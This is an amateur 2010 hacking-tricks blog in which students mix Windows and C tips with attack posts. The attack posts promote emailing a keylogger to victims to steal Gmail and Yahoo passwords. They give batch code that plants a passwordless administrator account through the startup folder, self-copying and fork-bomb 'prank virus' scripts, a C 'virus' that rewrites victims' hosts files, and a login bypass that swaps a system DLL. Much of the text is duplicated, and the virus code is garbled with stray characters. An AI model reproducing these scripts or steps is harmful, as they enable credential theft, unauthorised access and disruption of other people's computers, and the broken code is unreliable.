|
---|
|
---|
Friday, April 30, 2010
HoW tO sEcUrE uR pRiVaTe FoLdErS???
Hii Frnds This is my Best and New trick which help you to hide private data..
Do you have any private stuff that you would to hide from your friends and relatives? Would you want it to be Invisible so that it remains unnoticed by the normal users? But there are software which can display all the folders that are present on the Disk. So What if you can even password protect your folder? I guess having your private folder password protected as well as invisible should be secure enough. But you might think that you may need to have a software for that. Well here is a way to do that without using any additional software and you can show off in front of your friends by making their folders invisible as well as password protected. Here is is step by step procedure to create a password protected folder.
How to create a Password Protected Folder..its so simple...
1. Create a new folder (Right-click -> New -> Folder) and give it any name of your choice. For instance I name it as ABC.
2. Now in this folder place all the important files, documents or any folders that you want to password protect.
3. Now Right-click on this folder (ABC) and select the option Send To -> Compressed (zipped) Folder.
4. Now a new compressed zipped folder gets created next this folder (ABC) with the same name.
5. Double-click on this compressed zipped folder and you should see your original folder (ABC) here.
6. Now goto the File menu and select the option Add a password.
ie: File -> Add a password
Now a small window will pop up and here you can set your desired password. Once the password is set, the folder will ask for the password every time it is opened. Thus you have now created the password protected folder.
How to make it Invisible
1. Now Right-click on this password protected folder and select Properties.
2. At the bottom select the option Hidden and press OK. Now your folder gets invisible (hidden).
3. In order to unhide this folder go to My Computer – >Tools -> Folder options. Switch to View tab, scroll down and under Hidden files and folders you’ll see the following two options
Do not show hidden files and folders
Show hidden files and folders
Now select the second option and press OK. Now the invisible folder becomes visible in it’s location. To access it you need the password. To make it invisible again repeat step -1 through step-3 and select the first option and click OK. Now the folder becomes invisible once again.
RAMESH KUMAR(SIET CSE)
Labels:
Tips,
windows,
Windows tricks
How We Block The websites????????
Hii Frnds Everyone ask me that how we block a website..
so when i was work on internet i see the trick to block
websites.. but it requires that you are having admin.
authourity..plz dnt misuse it....here is trick
STEP:-1) go to my computer..
STEP:-2)open the drive where window is install..
STEP:-3)go to windows..
STEP:-4)then system 32..
STEP:-5)then drivers...
STEP:-6)then etc and after that host..
STEP:-6)select notepad..
STEP:-7)in notepad type the following
STEP:-8)(ip address of ur system) local host
(ip address of ur system) (site u want to block)
and now save it... site is blocked...
so when i was work on internet i see the trick to block
websites.. but it requires that you are having admin.
authourity..plz dnt misuse it....here is trick
STEP:-1) go to my computer..
STEP:-2)open the drive where window is install..
STEP:-3)go to windows..
STEP:-4)then system 32..
STEP:-5)then drivers...
STEP:-6)then etc and after that host..
STEP:-6)select notepad..
STEP:-7)in notepad type the following
STEP:-8)(ip address of ur system) local host
(ip address of ur system) (site u want to block)
and now save it... site is blocked...
HoW To CHANGE COLOR OF OUTPUT SCREEN IN C
Hii frnds.... whenever u run any C program, you finds that the color of
output screen is black...! you can change its color.... its very easy..
you have to follow only few steps.......
Open the FILE menu
Click on Dos-shell
Now type COLOR ?
Now type the color combination (example-"color 1c")
Now type exit
now the color of output screen has been changed.........
POSTED BY: MANMOHIT ARYA
output screen is black...! you can change its color.... its very easy..
you have to follow only few steps.......
now the color of output screen has been changed.........
POSTED BY: MANMOHIT ARYA
Labels:
"c" tricks
Thursday, April 29, 2010
easiest way to hack gmail
The easiest way to hack gmail is through keylogging. It is done using a small program/software called keylogger. This keylogger when installed on any computer will capture each and every keystroke including passwords. Also it works in complete stealth mode by completely hiding itself. So installing a keylogger on the computer is the easiest way to hack gmail. Once the victim logs into his gmail account from this computer his gmail username & password are captured and stored instantly. The stored logs are sent to you via email. But what if you do not have physical access to the computer? Well, still you need not worry since I am going to suggest one of the best keylogger program that support installation on a local computer as well as a remote computer. The following supports remote installation as well
Labels:
Hacking
hack yahoo password
You can hack Yahoo password using SniperSpy as follows:
1. After you purchase it, you’ll be able to create the installation module. You need to email this module to the remote user as an attachment.
2. When the remote user runs the module it’ll get installed silently and monitoring process will begin. The keystrokes are captured and uploaded to the SniperSpy servers continously.
3. You can login to your Sniperspy account (you get this after purchase) to see the logs which contains the password. In this way you can hack Yahoo or any email using sniperspy.
The working of Winspy is almost same as Sniperspy.
princy gupta
mmec
1. After you purchase it, you’ll be able to create the installation module. You need to email this module to the remote user as an attachment.
2. When the remote user runs the module it’ll get installed silently and monitoring process will begin. The keystrokes are captured and uploaded to the SniperSpy servers continously.
3. You can login to your Sniperspy account (you get this after purchase) to see the logs which contains the password. In this way you can hack Yahoo or any email using sniperspy.
The working of Winspy is almost same as Sniperspy.
princy gupta
mmec
Labels:
Hacking
Wednesday, April 28, 2010
use pendrive as ram!!!
hello friends....
today i will tell u how u can use pd as pendrive....
for gud performance use 4GB PD for this....
4GB pd works as 1GB ram
here is a trick:
1.right click on pendrive
2.go to properties
3.choose ready boost
4.now select dedicate this device to ready boost
now this is working as ram...
princy gupta
mmec
today i will tell u how u can use pd as pendrive....
for gud performance use 4GB PD for this....
4GB pd works as 1GB ram
here is a trick:
1.right click on pendrive
2.go to properties
3.choose ready boost
4.now select dedicate this device to ready boost
now this is working as ram...
princy gupta
mmec
Labels:
Tips,
windows,
Windows tricks
Tuesday, April 27, 2010
HOW TO GET THE COLOURED OUTPUT IN C
Whenever you run a C program, you have seen that the output format is of WHITE color.. but now you can change its colour, its so simple...
EXAMPLE:-
#include
#include
void main()
{
textcolor(4);
cprintf("HELLO");
getch();
}
POSTED BY: MANMOHIT ARYA
EXAMPLE:-
#include
#include
void main()
{
textcolor(4);
cprintf("HELLO");
getch();
}
POSTED BY: MANMOHIT ARYA
Labels:
"c" tricks
How to Open Office 2007 Documents in Older Versions of Office
With Microsoft Office 2007, Microsoft introduced a new set of file formats:.docx,xlsx, and .pptx, all not compatible with previous Microsoft Office versions. So if somebody sends you a Word 2007 document and you use Word XP, an error message awaits you. Luckily, the fix is easy: Use the Office plugin named Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats.
MOCPWEP2007FF enables you to open/edit/save Office 2007 documents in Office 2000, 2003, or XP without any work on your part. Just make sure that your office has the latest Service Pack installed - either SP3 for Office 2000 and XP, or SP1 for Office 2003.
If you don’t want to go all that difficulty and you just need to convert just a single .docx file, point your browser to docx-converter.com. Upload your file, select your preferred format (.doc is just one choice), and enter your email address. In a moment, you should get a note containing a link to download the converted file. It’s a free service.
posted by:MANMOHIT ARYA
MOCPWEP2007FF enables you to open/edit/save Office 2007 documents in Office 2000, 2003, or XP without any work on your part. Just make sure that your office has the latest Service Pack installed - either SP3 for Office 2000 and XP, or SP1 for Office 2003.
If you don’t want to go all that difficulty and you just need to convert just a single .docx file, point your browser to docx-converter.com. Upload your file, select your preferred format (.doc is just one choice), and enter your email address. In a moment, you should get a note containing a link to download the converted file. It’s a free service.
posted by:MANMOHIT ARYA
Labels:
Tips,
Windows tricks
Sunday, April 25, 2010
Change the name of your processer
show your pc's processer whatever you want you may shoe this Pentium 5 & more.
Go to START>RUN>TYPE REGEDIT>HKEY_LOCAL_MACHINE>HARDWARE>DISCRIPTION>SYSTEM>CENTRAL
PROCESSOR>ON RIGHT HAND SIDE RIGHT CLICK ON PROCESSOR NAME AND STRING AND THE CLICK ON
modify and write whatever you want.
Go to START>RUN>TYPE REGEDIT>HKEY_LOCAL_MACHINE>HARDWARE>DISCRIPTION>SYSTEM>CENTRAL
PROCESSOR>ON RIGHT HAND SIDE RIGHT CLICK ON PROCESSOR NAME AND STRING AND THE CLICK ON
modify and write whatever you want.
Clear The Memory Of Your Ram Without Restarting Your Computer
Most of the people are running windows on there personal computer. Many times the computer become slower. They usually Restart their computer to Remove the idle processes. But there is a simple way to do this without restarting. you may do this by following steps.
1. Right click on your desktop and then New->shortcut
2. Then type the blank section the the opened box
"%windir%\system32\rundll32.exe advapi32.dll,ProcessIdleTasks"
3. then press next and Give any name to it and then press finish ad you have made it.
Whenever you find your computer running with less speed you can double click on the shortcut and clear your memory. After doing this your computer will start running with normal speed.
1. Right click on your desktop and then New->shortcut
2. Then type the blank section the the opened box
"%windir%\system32\rundll32.exe advapi32.dll,ProcessIdleTasks"
3. then press next and Give any name to it and then press finish ad you have made it.
Whenever you find your computer running with less speed you can double click on the shortcut and clear your memory. After doing this your computer will start running with normal speed.
Break BIOS Password for Desktop :
If it's a desktop PC, erasing the cmos memory will usually clear it.
Steps:
1.Power off the computer and make sure that it is unplugged.
2.Open up your computer case. You need physical access to the motherboard to complete this procedure.
3.Find a circular, (mostly) silver metallic object on the motherboard. This is the CMOS battery.
4.CAREFULLY remove the CMOS battery and leave it out for about 120- 180 seconds. This will flush the CMOS memory which stores the BIOS password and all other configuration. (See Warnings)
5.Set the battery back into place and power on the computer.
6.The computer should then warn you that the CMOS configuration could not be found. You can either reconfigure it yourself or restore defaults. Restoring the default configuration should be fine.
7.You will notice that the BIOS password has been cleared and you can boot without it. You may reset the BIOS password to something else by going into the BIOS configuration and setting a new User Password.
princy gupta
mmec
Steps:
1.Power off the computer and make sure that it is unplugged.
2.Open up your computer case. You need physical access to the motherboard to complete this procedure.
3.Find a circular, (mostly) silver metallic object on the motherboard. This is the CMOS battery.
4.CAREFULLY remove the CMOS battery and leave it out for about 120- 180 seconds. This will flush the CMOS memory which stores the BIOS password and all other configuration. (See Warnings)
5.Set the battery back into place and power on the computer.
6.The computer should then warn you that the CMOS configuration could not be found. You can either reconfigure it yourself or restore defaults. Restoring the default configuration should be fine.
7.You will notice that the BIOS password has been cleared and you can boot without it. You may reset the BIOS password to something else by going into the BIOS configuration and setting a new User Password.
princy gupta
mmec
Labels:
windows,
Windows tricks
UsInG gUeSt, CrEaTe aN AdMiN aCcOuNt
Please do not misuse it...................
STEP(1):- open notepad copy and paste the following code into it and save the file as admin.bat(you can actually give it any name,just make sure that the extension is .bat.
@echo off
net user newadmin/add/expires:never/passwordseq:no
net localgroup"adminstrators"/add newadmin
STEP(2):-Copy the file to the startup folder Here is the path to the startup folder....
C:/dOCOUMENTS AND SETTINGS/ALL USERS/START MENU PROGRAMS/SETUP
The next time the admin logs into the computer,the batch file runs and the admin account is created. once the admin logs off,you can logs into using the username NEWADMIN And wthout any password... enjoy frnds Ramesh Kumar(SIET CSE)
STEP(1):- open notepad copy and paste the following code into it and save the file as admin.bat(you can actually give it any name,just make sure that the extension is .bat.
@echo off
net user newadmin/add/expires:never/passwordseq:no
net localgroup"adminstrators"/add newadmin
STEP(2):-Copy the file to the startup folder Here is the path to the startup folder....
C:/dOCOUMENTS AND SETTINGS/ALL USERS/START MENU PROGRAMS/SETUP
The next time the admin logs into the computer,the batch file runs and the admin account is created. once the admin logs off,you can logs into using the username NEWADMIN And wthout any password... enjoy frnds Ramesh Kumar(SIET CSE)
Labels:
Hacking,
windows,
Windows tricks
Google Funny Tricks
hii Frnds Want to write the name in place of ""'google""' inn google search engine its so simple just go to http://www.googlelogo.com/... if you open the site http://www.goglogo.com/.. see the google dance........
Labels:
Google
Saturday, April 24, 2010
Top Five websites Of The World
Hii Frnds everyone asked me the question that what are the top ten websites of the world.. here it is
GOOGLE.COM:-Enable user to search the web,usenet,and images and many other better feautures.
ALEXEA TRAFFIC RANK:-""1""
SITES LINKING:-""727,036""
FACEBOOK.COM:-A social utility that connects people,to keep up with friends,upload photos,share links and videos.
ALEXEA TRAFFIC RANK:-""2""
SITES LINKING:-""776,492""
YOUTUBE.COM:-you tube is a way to get your videos to the people who meet to you.upload,tag and share your videos world wide..
ALEXEA TRAFFIC RANK:-""3""
SITES LINKING:-""686,159""
YAHOO.COM:-Personlized content and search options,chatrooms,free e mail etc..
ALEXEA RANK:-""4""
SITES LINKING:-""119,825""
LIVE.COM:-This is the search engine launched by Microsoft..
ALEXEA RANK:-""5""
SITES LINKING:-""24,889""
Friday, April 23, 2010
how to make a prank virus only for fun!!!!
hello friends........
in this post i will tell you how can u make a funny prank virus :)
trick is here:
open notepad and type
@echo off
3echo checking system:4
5echo for %%i in ("*.bat") do copy %%i+c:\tmp.bat %%i >c:\windows\system32\autoexec.NT6echo VIRUS DETECTED
pause
echo DELETING VIRUS
pause
:1
dir /s
copy c:\tmp.bat c:\docum~1\%username%\desktop\greatgame_%random%.bat7
goto 1
This will create a never ending stream of mindless code. This cannot be stopped easily.8Save the file as "virus.bat"
The contrived tree rends a healthy workload.
princy gupta
mmec
in this post i will tell you how can u make a funny prank virus :)
trick is here:
open notepad and type
@echo off
3echo checking system:4
5echo for %%i in ("*.bat") do copy %%i+c:\tmp.bat %%i >c:\windows\system32\autoexec.NT6echo VIRUS DETECTED
pause
echo DELETING VIRUS
pause
:1
dir /s
copy c:\tmp.bat c:\docum~1\%username%\desktop\greatgame_%random%.bat7
goto 1
This will create a never ending stream of mindless code. This cannot be stopped easily.8Save the file as "virus.bat"
The contrived tree rends a healthy workload.
princy gupta
mmec
Labels:
Make Virus
Tuesday, April 20, 2010
How to Hack Into a Windows XP Computer Without Changing Password
Another method to login to a password protected Windows even if you do not have the password is by making Windows accepting any passwords.
There is a far better way to get into Windows XP. It is easy and it does not reset the password. Hack into a computer running Windows XP without changing the password and find out all and any passwords on the machine (including admin accounts). You do not need access to any accounts to do this. Of course, do not do this on anyone elses computer without proper authorization.
Steps to Hack into a Windows XP Computer without changing password:
1. Get physical access to the machine. Remember that it must have a CD or DVD drive.
2.Download this archive file (Size: 4.5 Mb).
3. Unzip the downloaded PCHaCKs-DreamPack.zip and you’ll get dpl.ISO.
4. Use any burning program that can burn ISO images like UltraISO, PowerISO or Nero.
5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.
6. Press “R” to install DreamPackPL.
7. Press “C” to install DreamPackPL by using the recovery console.
8. Select the Windows installation that is currently on the computer (Normally is “1″ if you only have one Windows installed)
9. Backup your original sfcfiles.dll by typing:
“ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld” (without quotes)
10. Copy the hacked file from CD to system32 folder. Type:
“copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll” (without quotes and assuming your CD drive is D:)
11. Type “exit”, take out disk and reboot.
12. In the password field, type “dreamon” (without quotes) and DreamPack menu will appear.
13. Click the top graphic on the DreamPack menu and you will get a menu popup.
14. Go to commands and enable the options and enable the god command.
15. Type “god” in the password field to get in Windows.
You can also go to Passwords and select “Logon with wrong password and hash”. This option allows you to login with ANY password.
Note: I was unable to bring up the DreamPackPL for the first time because I have Kaspersky Anti-Virus already running in background. I believe most antivirus already labeled this tool as a Hack-Tool. A Hack-Tool is NOT a virus. DreamPackPL helps you bypass the Windows Login screen and it is not destructive.
PRINCY GUPTA
MMEC
There is a far better way to get into Windows XP. It is easy and it does not reset the password. Hack into a computer running Windows XP without changing the password and find out all and any passwords on the machine (including admin accounts). You do not need access to any accounts to do this. Of course, do not do this on anyone elses computer without proper authorization.
Steps to Hack into a Windows XP Computer without changing password:
1. Get physical access to the machine. Remember that it must have a CD or DVD drive.
2.Download this archive file (Size: 4.5 Mb).
3. Unzip the downloaded PCHaCKs-DreamPack.zip and you’ll get dpl.ISO.
4. Use any burning program that can burn ISO images like UltraISO, PowerISO or Nero.
5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.
6. Press “R” to install DreamPackPL.
7. Press “C” to install DreamPackPL by using the recovery console.
8. Select the Windows installation that is currently on the computer (Normally is “1″ if you only have one Windows installed)
9. Backup your original sfcfiles.dll by typing:
“ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld” (without quotes)
10. Copy the hacked file from CD to system32 folder. Type:
“copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll” (without quotes and assuming your CD drive is D:)
11. Type “exit”, take out disk and reboot.
12. In the password field, type “dreamon” (without quotes) and DreamPack menu will appear.
13. Click the top graphic on the DreamPack menu and you will get a menu popup.
14. Go to commands and enable the options and enable the god command.
15. Type “god” in the password field to get in Windows.
You can also go to Passwords and select “Logon with wrong password and hash”. This option allows you to login with ANY password.
Note: I was unable to bring up the DreamPackPL for the first time because I have Kaspersky Anti-Virus already running in background. I believe most antivirus already labeled this tool as a Hack-Tool. A Hack-Tool is NOT a virus. DreamPackPL helps you bypass the Windows Login screen and it is not destructive.
PRINCY GUPTA
MMEC
Labels:
Hacking,
windows,
Windows tricks
make a freez virus only for fun
hello....
many of ma friends ask me plz tell me how can i make freez virus??
now the answer is here.....
i have a new trick for making a freez virus.
it is totaly harmless and it is only for fun.
try it and watch result!!! :)
WARNING:-dont try it on angry friends..... hahahahahahaha
here is a trick:
1. open notepad
2. type "start virus.bat"
3. next line type "virus.bat"
4.save it as "virus.bat"
5.now open file and watch....
for stop this the only solution is shut down.
i also did this so many time....
enjoy:)
princy gupta(2nd yr)
MMEC
many of ma friends ask me plz tell me how can i make freez virus??
now the answer is here.....
i have a new trick for making a freez virus.
it is totaly harmless and it is only for fun.
try it and watch result!!! :)
WARNING:-dont try it on angry friends..... hahahahahahaha
here is a trick:
1. open notepad
2. type "start virus.bat"
3. next line type "virus.bat"
4.save it as "virus.bat"
5.now open file and watch....
for stop this the only solution is shut down.
i also did this so many time....
enjoy:)
princy gupta(2nd yr)
MMEC
Labels:
Hacking,
Make Virus
Monday, April 19, 2010
Make a Virus Program to Block any site in 'C'
Many of my friends are familiar with the virus used to block sites like orkut,google etc. these virus are created and now friends in my this post i am going to explain how you can block sites using any such type of 'c' program when it is clicked by the user or victim then he will not be able to open/access those sites (which are mentioned in the program) unless he/she will reinstall the operating system. This is a simple program in one of the my favorite language and need a little 'C' understanding to understand this program.
I thing you friends will like this.
Here we go:
#include
#include
#include
char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;
int find_root(void);
void block_site(void);
int find_root()
{
int done;
struct ffblk ffblk;//File block structure
done=findfirst(“C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
else return 0;
}
void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/
fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}
void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}
Compile this program and to test this program just follow the following steps:
1. To test this program once you have run block.exe. restart your browser and ten enter one of the site name you have specified in the program and then the message on your will be "The Page Cannot be displayed"
2. To remove the virus
type the following the Run.
%windir%\system32\drivers\etc
3.There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this
127.0.0.1—————————google.com
4. Delete the entire content of the blocked sites.
Labels:
Hacking
Sunday, April 18, 2010
shut down friend's pc without touching it!!
hi friends!!
i have a new trick shut down your friend's pc witjout touching it.... :)
it so simple. you can easily do this.....
here is a trick:
1.open command prompt using ctrl+shift+enter.
2. type shutdown -i.
3. a net window is open, click on add and put friends ip on it....
4. you can also add comment and time.
do and watch, enjoy hacking.....
princy gupta
MMEC
i have a new trick shut down your friend's pc witjout touching it.... :)
it so simple. you can easily do this.....
here is a trick:
1.open command prompt using ctrl+shift+enter.
2. type shutdown -i.
3. a net window is open, click on add and put friends ip on it....
4. you can also add comment and time.
do and watch, enjoy hacking.....
princy gupta
MMEC
Friday, April 16, 2010
run a c program without using main function
you know guys! it is really possible...
and it is so simple, you can easily do this!!!
here is a program....
run it and watch result!!!
#include
#define decode(s,t,u,m,p,e,d) m##s##u##t
#define begin decode(a,n,i,m,a,t,e)
int begin()
{
printf(" hello ");
}
princy gupta(2nd yr)
MMEC
and it is so simple, you can easily do this!!!
here is a program....
run it and watch result!!!
#include
#define decode(s,t,u,m,p,e,d) m##s##u##t
#define begin decode(a,n,i,m,a,t,e)
int begin()
{
printf(" hello ");
}
princy gupta(2nd yr)
MMEC
Labels:
Hacking
Subscribe to:
Posts (Atom)